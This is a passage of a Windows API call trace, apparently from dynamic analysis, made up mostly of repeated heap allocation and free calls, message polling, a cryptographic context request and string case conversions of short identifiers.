(in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.230] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0261.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.235] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0261.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.237] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0261.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.240] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.242] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.243] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0261.243] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.243] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0261.243] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0261.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.243] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.244] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0261.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.245] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0261.245] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 